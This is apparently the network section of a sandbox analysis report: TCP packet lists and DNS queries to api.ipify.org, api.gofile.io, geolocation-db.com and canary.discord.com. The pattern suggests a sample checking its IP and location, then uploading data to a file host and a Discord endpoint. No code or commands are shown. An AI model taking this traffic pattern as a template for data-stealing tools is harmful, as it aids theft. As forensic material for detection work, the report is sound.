Feb 14, 2023 04:50:16.714169025 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.715401888 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.715826035 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.718074083 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.718086958 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.718195915 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.718441010 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.718451977 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.768299103 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.768328905 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.815064907 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.923717976 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.923806906 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.923866987 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:16.925626040 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:17.067667007 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:17.067831993 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:17.067935944 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:17.341336012 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:17.566687107 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.566764116 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.566849947 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.567867041 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.567895889 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.569211006 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.569281101 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.569382906 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.569816113 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.569852114 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.690259933 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.695312023 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.695398092 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.696806908 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.697110891 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.697926998 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.697988033 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.698105097 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.698122025 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.698255062 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.698935032 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.699270964 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.699316025 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.700659990 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.700737000 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.701724052 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.701735973 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.701853991 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.701864004 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.701872110 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.734915972 CET	443	49693	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.735111952 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.739542007 CET	443	49692	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:17.739770889 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:17.774334908 CET	49693	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:18.693700075 CET	49692	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:18.952910900 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:18.952969074 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:18.953062057 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:18.954152107 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:18.954168081 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:18.955054045 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:18.955091000 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:18.955171108 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.001642942 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.015484095 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.015531063 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.015995979 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.016026974 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.017591953 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.017708063 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.019416094 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.019442081 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.019583941 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.019591093 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.019613981 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.019649982 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.019655943 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.059063911 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.059525967 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.059560061 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.060784101 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.060878038 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.062820911 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.062839031 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.062944889 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.063031912 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.063050032 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.063111067 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.063117981 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.159008026 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.159053087 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.264301062 CET	443	49694	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.264578104 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:19.325135946 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.325237989 CET	443	49695	162.159.128.233	192.168.2.5
Feb 14, 2023 04:50:19.325356960 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:20.056694984 CET	49694	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:20.063313961 CET	49695	443	192.168.2.5	162.159.128.233
Feb 14, 2023 04:50:20.184555054 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.184627056 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.184727907 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.313296080 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.313374996 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.436244011 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.518594980 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.665621996 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.665666103 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.669193029 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.669271946 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.669286013 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.670752048 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:20.670770884 CET	443	49696	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:20.671174049 CET	49696	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:21.040185928 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.040267944 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.040425062 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.041831017 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.041852951 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.467710018 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.468307972 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.468353987 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.469656944 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.469794035 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.470948935 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.470974922 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.471092939 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.471163988 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.471179008 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.518568993 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.784123898 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.784288883 CET	443	49697	64.185.227.155	192.168.2.5
Feb 14, 2023 04:50:21.784368038 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.785008907 CET	49697	443	192.168.2.5	64.185.227.155
Feb 14, 2023 04:50:21.973083019 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:21.973149061 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:21.973244905 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:21.974442959 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:21.974488020 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.104501963 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.105026007 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:22.105087996 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.108202934 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.108350992 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:22.109615088 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:22.109641075 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.109791994 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:22.109798908 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.109864950 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.163785934 CET	443	49698	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:22.163973093 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:22.184227943 CET	49698	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:22.325606108 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.325664997 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.325814009 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.326658010 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.326683044 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.374504089 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.376682043 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.376724958 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.379061937 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.379198074 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.380260944 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.380290985 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.380403042 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.380415916 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.380438089 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.380459070 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.380470037 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.518644094 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.518667936 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.650062084 CET	443	49699	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:22.650197983 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.650834084 CET	49699	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:22.997504950 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:22.997560024 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:22.997740984 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:22.999432087 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:22.999456882 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.357148886 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.357806921 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.357830048 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.359523058 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.359642982 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.374845028 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.374875069 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.375001907 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.375009060 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.375077009 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.426350117 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.426389933 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.473098993 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.723059893 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.723154068 CET	443	49700	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:24.723325968 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.725466967 CET	49700	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:24.853352070 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.853429079 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.853548050 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.854424000 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.854459047 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.968301058 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.968813896 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.968859911 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.971013069 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.971210003 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.972311974 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.972332954 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.972490072 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:24.972503901 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:24.972527027 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:25.019956112 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:25.019999981 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:25.043226957 CET	443	49701	159.89.102.253	192.168.2.5
Feb 14, 2023 04:50:25.043325901 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:25.044004917 CET	49701	443	192.168.2.5	159.89.102.253
Feb 14, 2023 04:50:25.169680119 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.169761896 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.169856071 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.170948029 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.170994997 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.217991114 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.218466997 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.218533993 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.219835043 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.219955921 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.220985889 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.221012115 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.221132040 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.221179962 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.221196890 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.221247911 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.221271038 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.269952059 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.466192007 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.466355085 CET	443	49702	162.159.137.232	192.168.2.5
Feb 14, 2023 04:50:25.466454983 CET	49702	443	192.168.2.5	162.159.137.232
Feb 14, 2023 04:50:25.466939926 CET	49702	443	192.168.2.5	162.159.137.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2023 04:50:15.803636074 CET	54949	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:15.825283051 CET	53	54949	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:15.836875916 CET	58218	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:15.856281996 CET	53	58218	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:16.197141886 CET	60998	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:16.219109058 CET	53	60998	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:17.545181990 CET	56953	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:17.564898968 CET	53	56953	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:18.895343065 CET	59287	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:18.915142059 CET	53	59287	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:20.163604021 CET	58648	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:20.181955099 CET	53	58648	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:21.002707005 CET	56894	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:21.024468899 CET	53	56894	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:21.953958035 CET	50295	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:21.971434116 CET	53	50295	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:22.303461075 CET	60841	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:22.324009895 CET	53	60841	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:22.977411032 CET	61893	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:22.995713949 CET	53	61893	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:24.832114935 CET	60649	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:24.851963043 CET	53	60649	8.8.8.8	192.168.2.5
Feb 14, 2023 04:50:25.147973061 CET	51441	53	192.168.2.5	8.8.8.8
Feb 14, 2023 04:50:25.168028116 CET	53	51441	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2023 04:50:15.803636074 CET	192.168.2.5	8.8.8.8	0xa3b9	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:15.836875916 CET	192.168.2.5	8.8.8.8	0x8748	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:16.197141886 CET	192.168.2.5	8.8.8.8	0x8120	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:17.545181990 CET	192.168.2.5	8.8.8.8	0xd26	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:18.895343065 CET	192.168.2.5	8.8.8.8	0xc4cc	Standard query (0)	canary.discord.com	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:20.163604021 CET	192.168.2.5	8.8.8.8	0x7821	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:21.002707005 CET	192.168.2.5	8.8.8.8	0xd4df	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:21.953958035 CET	192.168.2.5	8.8.8.8	0xd46d	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.303461075 CET	192.168.2.5	8.8.8.8	0x4ad6	Standard query (0)	canary.discord.com	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.977411032 CET	192.168.2.5	8.8.8.8	0x144c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:24.832114935 CET	192.168.2.5	8.8.8.8	0xa73d	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:25.147973061 CET	192.168.2.5	8.8.8.8	0x952c	Standard query (0)	canary.discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 14, 2023 04:50:15.825283051 CET	8.8.8.8	192.168.2.5	0xa3b9	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2023 04:50:15.825283051 CET	8.8.8.8	192.168.2.5	0xa3b9	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:15.825283051 CET	8.8.8.8	192.168.2.5	0xa3b9	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:15.825283051 CET	8.8.8.8	192.168.2.5	0xa3b9	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:15.856281996 CET	8.8.8.8	192.168.2.5	0x8748	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:15.856281996 CET	8.8.8.8	192.168.2.5	0x8748	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:15.856281996 CET	8.8.8.8	192.168.2.5	0x8748	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:16.219109058 CET	8.8.8.8	192.168.2.5	0x8120	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2023 04:50:16.219109058 CET	8.8.8.8	192.168.2.5	0x8120	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:16.219109058 CET	8.8.8.8	192.168.2.5	0x8120	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:16.219109058 CET	8.8.8.8	192.168.2.5	0x8120	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:17.564898968 CET	8.8.8.8	192.168.2.5	0xd26	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:18.915142059 CET	8.8.8.8	192.168.2.5	0xc4cc	No error (0)	canary.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:18.915142059 CET	8.8.8.8	192.168.2.5	0xc4cc	No error (0)	canary.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:18.915142059 CET	8.8.8.8	192.168.2.5	0xc4cc	No error (0)	canary.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:18.915142059 CET	8.8.8.8	192.168.2.5	0xc4cc	No error (0)	canary.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:18.915142059 CET	8.8.8.8	192.168.2.5	0xc4cc	No error (0)	canary.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:20.181955099 CET	8.8.8.8	192.168.2.5	0x7821	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:20.181955099 CET	8.8.8.8	192.168.2.5	0x7821	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:20.181955099 CET	8.8.8.8	192.168.2.5	0x7821	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:21.024468899 CET	8.8.8.8	192.168.2.5	0xd4df	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2023 04:50:21.024468899 CET	8.8.8.8	192.168.2.5	0xd4df	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:21.024468899 CET	8.8.8.8	192.168.2.5	0xd4df	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:21.024468899 CET	8.8.8.8	192.168.2.5	0xd4df	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:21.971434116 CET	8.8.8.8	192.168.2.5	0xd46d	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.324009895 CET	8.8.8.8	192.168.2.5	0x4ad6	No error (0)	canary.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.324009895 CET	8.8.8.8	192.168.2.5	0x4ad6	No error (0)	canary.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.324009895 CET	8.8.8.8	192.168.2.5	0x4ad6	No error (0)	canary.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
